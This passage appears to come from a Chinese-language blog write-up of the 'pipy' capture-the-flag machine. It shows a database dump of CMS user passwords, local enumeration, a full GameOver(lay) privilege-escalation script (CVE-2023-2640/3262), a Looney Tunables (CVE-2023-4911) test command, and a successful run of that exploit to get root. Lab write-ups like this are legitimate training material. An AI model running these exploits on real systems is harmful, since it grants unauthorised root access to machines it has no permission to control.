| nom          | text         | NO   |     | ''                  |                               |
| bio          | text         | NO   |     | ''                  |                               |
| email        | tinytext     | NO   |     | ''                  |                               |
| nom_site     | tinytext     | NO   |     | ''                  |                               |
| url_site     | text         | NO   |     | ''                  |                               |
| login        | varchar(255) | YES  | MUL | NULL                |                               |
| pass         | tinytext     | NO   |     | ''                  |                               |
| low_sec      | tinytext     | NO   |     | ''                  |                               |
| statut       | varchar(255) | NO   | MUL | 0                   |                               |
| webmestre    | varchar(3)   | NO   |     | non                 |                               |
| maj          | timestamp    | NO   |     | current_timestamp() | on update current_timestamp() |
| pgp          | text         | NO   |     | ''                  |                               |
| htpass       | tinytext     | NO   |     | ''                  |                               |
| en_ligne     | datetime     | NO   | MUL | 0000-00-00 00:00:00 |                               |
| alea_actuel  | tinytext     | YES  |     | NULL                |                               |
| alea_futur   | tinytext     | YES  |     | NULL                |                               |
| prefs        | text         | YES  |     | NULL                |                               |
| cookie_oubli | tinytext     | YES  |     | NULL                |                               |
| source       | varchar(10)  | NO   |     | spip                |                               |
| lang         | varchar(10)  | NO   |     |                     |                               |
| imessage     | varchar(3)   | NO   |     |                     |                               |
| backup_cles  | mediumtext   | NO   |     | ''                  |                               |
+--------------+--------------+------+-----+---------------------+-------------------------------+
23 rows in set (0.001 sec)

MariaDB [spip]> select id_auteur,pass,htpass from spip_auteurs;
+-----------+--------------------------------------------------------------+--------+
| id_auteur | pass                                                         | htpass |
+-----------+--------------------------------------------------------------+--------+
|         1 | 4ng3l4                                                       |        |
|         2 | $2y$10$UU8xkGHmmSzrF6elpQWjmeXooyfzHBLZPxxD4moW.oyCtSB.8i55e |        |
+-----------+--------------------------------------------------------------+--------+
2 rows in set (0.000 sec)

MariaDB [spip]> select nom,bio,email from spip_auteurs;
+--------+-----+-----------------+
| nom    | bio | email           |
+--------+-----+-----------------+
| Angela |     | angela@pipy.htb |
| admin  |     | admin@pipy.htb  |
+--------+-----+-----------------+
2 rows in set (0.000 sec)

得到用户名和密码:

Angela
4ng3l4 

切换Angela

su angela
4ng3l4

image-20240410132714848

信息搜集

angela@pipy:~$ sudo -l
[sudo] password for angela: 
Sorry, user angela may not run sudo on pipy.
angela@pipy:~$ cat user.txt 
dab37650d43787424362d5805140538d
angela@pipy:~$ cat /etc/cron*
cat: /etc/cron.d: Is a directory
cat: /etc/cron.daily: Is a directory
cat: /etc/cron.hourly: Is a directory
cat: /etc/cron.monthly: Is a directory
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
# You can also override PATH, but by default, newer versions inherit it from the environment
#PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name command to be executed
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
cat: /etc/cron.weekly: Is a directory
angela@pipy:~$ find / -perm -u=s -type f 2>/dev/null
......基本都无法利用
angela@pipy:~$ find / -writable -type f 2>/dev/null
......一无所获

上传linpeas.shpspy64分析一下:

angela@pipy:~$ 
(local) pwncat$ lpwd
/home/kali/temp/pipy
(local) pwncat$ lcd ..
(remote) angela@pipy:/home/angela$ cd /tmp
(remote) angela@pipy:/tmp$ 
(local) pwncat$ upload linpeas.sh
(local) pwncat$ upload pspy64
(local) pwncat$
(remote) angela@pipy:/tmp$ ls
linpeas.sh  pspy64
(remote) angela@pipy:/tmp$ chmod +x *
(remote) angela@pipy:/tmp$ ./linpeas.sh

查看一下有哪些信息:

image-20240410134128343

pspy64查看一下,等了半天,毛都没发现。。。

(remote) angela@pipy:/tmp$ ss -tulnp
Netid         State          Recv-Q         Send-Q                       Local Address:Port                   Peer Address:Port
udp           UNCONN         0              0                            127.0.0.53%lo:53                          0.0.0.0:*
udp           UNCONN         0              0                       172.20.10.4%enp0s3:68                          0.0.0.0:*
tcp           LISTEN         0              80                               127.0.0.1:3306                        0.0.0.0:*
tcp           LISTEN         0              4096                         127.0.0.53%lo:53                          0.0.0.0:*
tcp           LISTEN         0              128                                0.0.0.0:22                          0.0.0.0:*
tcp           LISTEN         0              1024                             127.0.0.1:4226                        0.0.0.0:*
tcp           LISTEN         0              511                                      *:80                                *:*
tcp           LISTEN         0              128                                   [::]:22                             [::]:*

内核提权

但是没有发现啥,只能尝试我们最不想进行的操作了,尝试内核是否有问题。。。

(remote) angela@pipy:/tmp$ uname -a
Linux pipy 5.15.0-84-generic #93-Ubuntu SMP Tue Sep 5 17:16:10 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
(remote) angela@pipy:/tmp$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description:    Ubuntu 22.04.3 LTS
Release:        22.04
Codename:       jammy
┌──(kali💀kali)-[~/temp/pipy]
└─$ searchsploit ubuntu 22.04  
Exploits: No Results
Shellcodes: No Results

image-20240410135421222

image-20240410135550203

先尝试一下:

#!/bin/bash

# CVE-2023-2640 CVE-2023-3262: GameOver(lay) Ubuntu Privilege Escalation
# by g1vi https://github.com/g1vi
# October 2023

echo "[+] You should be root now"
echo "[+] Type 'exit' to finish and leave the house cleaned"

unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("cp /bin/bash /var/tmp/bash && chmod 4755 /var/tmp/bash && /var/tmp/bash -p && rm -rf l m u w /var/tmp/bash")'

去年十月份的,也可能是这个!运行一下:

(remote) angela@pipy:/tmp$ vim exploit.sh
(remote) angela@pipy:/tmp$ chmod +x exploit.sh 
(remote) angela@pipy:/tmp$ ./exploit.sh 
[+] You should be root now
[+] Type 'exit' to finish and leave the house cleaned
Traceback (most recent call last):
  File "<string>", line 1, in <module>
PermissionError: [Errno 1] Operation not permitted
(remote) angela@pipy:/tmp$ ls -l exploit.sh 
-rwxrwxr-x 1 angela angela 558 Apr 10 05:56 exploit.sh

好像不行欸,继续看看别的:

image-20240410140023349

第四个似乎更符合我们的系统glibc,尝试一下:

(remote) angela@pipy:/tmp$ 
(local) pwncat$ upload CVE-2023-4911-main.zip
./CVE-2023-4911-main.zip ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100.0% • 3.7/3.7 KB • ? • 0:00:00[02:04:18] uploaded 3.68KiB in 0.31 seconds                                                                                                 upload.py:76
(local) pwncat$                                                                                                                                         
(remote) angela@pipy:/tmp$ ls
CVE-2023-4911-main.zip  exploit.sh  l  linpeas.sh  m  pspy64  tmux-1000  u  w
(remote) angela@pipy:/tmp$ unzip CVE-2023-4911-main.zip 
Archive:  CVE-2023-4911-main.zip
4ecc0713f7f12bc914d07c708ded10c17365ea79
   creating: CVE-2023-4911-main/
  inflating: CVE-2023-4911-main/Makefile  
  inflating: CVE-2023-4911-main/README.md  
  inflating: CVE-2023-4911-main/create-libc.py  
  inflating: CVE-2023-4911-main/gdb-script  
  inflating: CVE-2023-4911-main/xpl.c  
(remote) angela@pipy:/tmp$ ls
CVE-2023-4911-main  CVE-2023-4911-main.zip  exploit.sh  l  linpeas.sh  m  pspy64  tmux-1000  u  w
(remote) angela@pipy:/tmp$ cd CVE-2023-4911-main/
(remote) angela@pipy:/tmp/CVE-2023-4911-main$ ls
create-libc.py  gdb-script  Makefile  README.md  xpl.c
(remote) angela@pipy:/tmp/CVE-2023-4911-main$ make
python3 ./create-libc.py
[*] Checking for new versions of pwntools
    To disable this functionality, set the contents of /home/angela/.cache/.pwntools-cache-3.10/update to 'never' (old way).
    Or add the following lines to ~/.pwn.conf or ~/.config/pwn.conf (or /etc/pwn.conf system-wide):
        [update]
        interval=never
[*] A newer version of pwntools is available on pypi (4.11.0 --> 4.12.0).
    Update with: $ pip install -U pwntools
gcc xpl.c -o xpl
(remote) angela@pipy:/tmp/CVE-2023-4911-main$ ls
'"'   create-libc.py   gdb-script   Makefile   README.md   xpl   xpl.c
(remote) angela@pipy:/tmp/CVE-2023-4911-main$ ls -l*
ls: invalid option -- '*'
Try 'ls --help' for more information.
(remote) angela@pipy:/tmp/CVE-2023-4911-main$ ls -l xpl
-rwxrwxr-x 1 angela angela 16544 Apr 10 06:04 xpl
(remote) angela@pipy:/tmp/CVE-2023-4911-main$ ./xpl
=============================
[+] Exploit by DiegoAltF4 [+]
=============================

Starting bruteforce ...

[0]
[100]
[200]
[300]
[400]
[500]
[600]
[700]
[800]
[900]
[1000]
[1100]
[1200]
[1300]
[1400]
[1500]
[1600]
[1700]
[1800]
[1900]
[2000]
[2100]
[2200]
[2300]
[2400]
[2500]

Usage:
 su [options] [-] [<user> [<argument>...]]

Change the effective user ID and group ID to that of <user>.
A mere - implies -l.  If <user> is not given, root is assumed.

Options:
 -m, -p, --preserve-environment      do not reset environment variables
 -w, --whitelist-environment <list>  don't reset specified variables

 -g, --group <group>             specify the primary group
 -G, --supp-group <group>        specify a supplemental group

 -, -l, --login                  make the shell a login shell
 -c, --command <command>         pass a single command to the shell with -c
 --session-command <command>     pass a single command to the shell with -c
                                   and do not create a new session
 -f, --fast                      pass -f to the shell (for csh or tcsh)
 -s, --shell <shell>             run <shell> if /etc/shells allows it
 -P, --pty                       create a new pseudo-terminal

 -h, --help                      display this help
 -V, --version                   display version

For more details see su(1).
[2600]
[2700]
[2800]
^C

寄了,难道不是内核提权?去翻了一下别的师傅的blog发现真的是。。。而且还是这个漏洞,但是我没跑出来,继续找一下:

image-20240410141159008

先使用以下命令确定是否存在该漏洞:

env -i "GLIBC_TUNABLES=glibc.malloc.mxfast=glibc.malloc.mxfast=A" "Z=`printf '%08192x' 1`" /usr/bin/su --help

出现如下即存在:

Segmentation fault (core dumped)

尝试利用以下:https://github.com/ruycr4ft/CVE-2023-4911

(第一个似乎指明了是Ubuntu 22.10 kinetic,不符合本题)

(remote) angela@pipy:/tmp$ rm CVE-2023-4911-main.zip 
(remote) angela@pipy:/tmp$ rm -rf CVE-2023-4911-main/
(remote) angela@pipy:/tmp$ ls
exploit.sh  l  linpeas.sh  m  pspy64  tmux-1000  u  w
(remote) angela@pipy:/tmp$ 
(local) pwncat$ upload CVE-2023-4911-main.zip
./CVE-2023-4911-main.zip ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100.0% • 66.0/66.0 KB • ? • 0:00:00[02:18:52] uploaded 65.97KiB in 0.33 seconds                                                                                                upload.py:76
(local) pwncat$                                                                                                                                         
(remote) angela@pipy:/tmp$ unzip CVE-2023-4911-main.zip 
Archive:  CVE-2023-4911-main.zip
0e041812da0c8ca165f6ec660925838065707d32
   creating: CVE-2023-4911-main/
  inflating: CVE-2023-4911-main/Makefile  
  inflating: CVE-2023-4911-main/README.md  
  inflating: CVE-2023-4911-main/exp.c  
  inflating: CVE-2023-4911-main/gen_libc.py  
  inflating: CVE-2023-4911-main/poc.png  
  inflating: CVE-2023-4911-main/version.png  
  inflating: CVE-2023-4911-main/vuln.png  
(remote) angela@pipy:/tmp$ cd CVE-2023-4911-main/
(remote) angela@pipy:/tmp/CVE-2023-4911-main$ make
gcc -o exp exp.c
python3 gen_libc.py
[*] '/lib/x86_64-linux-gnu/libc.so.6'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
./exp
try 100
try 200
try 300
try 400
try 500
try 600
try 700
# whoami;id
root
uid=0(root) gid=0(root) groups=0(root),1000(angela)
# cd /root
# ls 
root.txt  snap
# cat ro
cat: ro: No such file or directory
# cat root.txt
ab55ed08716cd894e8097a87dafed016

拿到flag!!!

如果是直接nc的可能需要稳定一下shell

script -c /bin/bash /dev/null
ctrl + z
echo $TERM && tput lines && tput cols
stty raw -echo; fg
reset xterm  # 到这里一般就行了
export SHELL=bash
export TERM=xterm-256color
stty rows [num] columns [cols]
暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇